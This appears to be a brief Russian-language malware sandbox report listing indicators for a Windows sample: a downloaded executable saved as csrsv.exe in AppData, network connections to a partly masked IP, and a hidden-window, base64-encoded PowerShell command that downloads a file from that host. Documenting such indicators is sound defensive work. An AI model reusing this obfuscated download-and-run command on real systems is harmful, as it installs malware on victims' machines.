Техническая информация
- http://94.##2.53.238/~yahoo/csrsv.exe как %appdata%\csrsv.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1404
- %TEMP%\647528.cvr
- '94.##2.53.238':80
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADQALgAxADAAMg... (со скрытым окном)